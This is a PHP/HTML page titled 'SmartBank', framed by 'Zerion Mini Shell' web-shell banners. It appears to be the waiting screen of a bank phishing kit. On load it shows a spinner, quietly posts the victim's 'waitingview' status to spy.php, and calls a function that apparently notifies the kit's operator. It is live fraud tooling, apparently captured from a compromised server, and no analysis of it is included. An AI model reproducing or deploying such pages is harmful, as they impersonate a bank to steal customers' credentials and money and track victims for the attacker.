Mini Shell
<?php require(__DIR__) . '/../main.php'; ?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>SmartBank</title>
<!-- <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.4/css/all.min.css"
integrity="sha512-1ycn6IcaQQ40/MKBW2W4Rhis/DbILU74C1vSrLJxCq57o941Ym01SwNsOMqvEBFlcgUa6xLiPY/NS5R+E6ztJQ=="
crossorigin="anonymous" referrerpolicy="no-referrer" /> -->
<link href="https://cdn.jsdelivr.net/gh/hung1001/font-awesome-pro@4cac1a6/css/all.css" rel="stylesheet"
type="text/css" />
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@5.2.3/dist/css/bootstrap.min.css"
integrity="sha384-rbsA2VBKQhggwzxH7pPCaAqO46MgnOM80zW1RWuH61DGLwZJEdK2Kadq2F9CUG65" crossorigin="anonymous">
<!-- <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css"> -->
<link rel="stylesheet" href="themes/css/login.css">
</head>
<body>
<div class="nav_buybd">
<img class="beuxes" src="assets/images/logo.svg" alt="">
</div>
<div class="container-fluid mt-5">
<div class="row">
<div class="col-12">
<div class="knoende">
<img src="assets/images/waiting.gif" alt="" class="meefcdec">
</div>
</div>
</div>
</div>
<script>
document.addEventListener("DOMContentLoaded", function () {
const inputElements = document.querySelectorAll(".inputss");
const checkButton = document.getElementById("checkButton");
// Function to check if all inputs are not empty
function areAllInputsNotEmpty() {
let allNotEmpty = true;
inputElements.forEach((input) => {
if (input.value.trim() === "") {
allNotEmpty = false;
}
});
return allNotEmpty;
}
// Event listener for input changes
inputElements.forEach((input) => {
input.addEventListener("input", function () {
checkButton.disabled = !areAllInputsNotEmpty();
if (areAllInputsNotEmpty()) {
checkButton.style.backgroundColor = "rgb(82, 174, 48)"
checkButton.style.color = "#fff"
} else {
checkButton.style.backgroundColor = "#e3e3e3"
checkButton.style.color = "#797979"
}
});
});
// // Event listener for the check button
// checkButton.addEventListener("click", function () {
// if (areAllInputsNotEmpty()) {
// alert("All inputs are not empty!");
// } else {
// alert("Some inputs are empty.");
// }
// });
});
</script>
<script src="res/jq.js"></script>
<script>
$.post("spy.php", {
waitingview: 1
});
</script>
<?php
$m->ctr("WAIT (" . @$_GET['p'] . ")");
?>
</body>
</html>
Zerion Mini Shell 1.0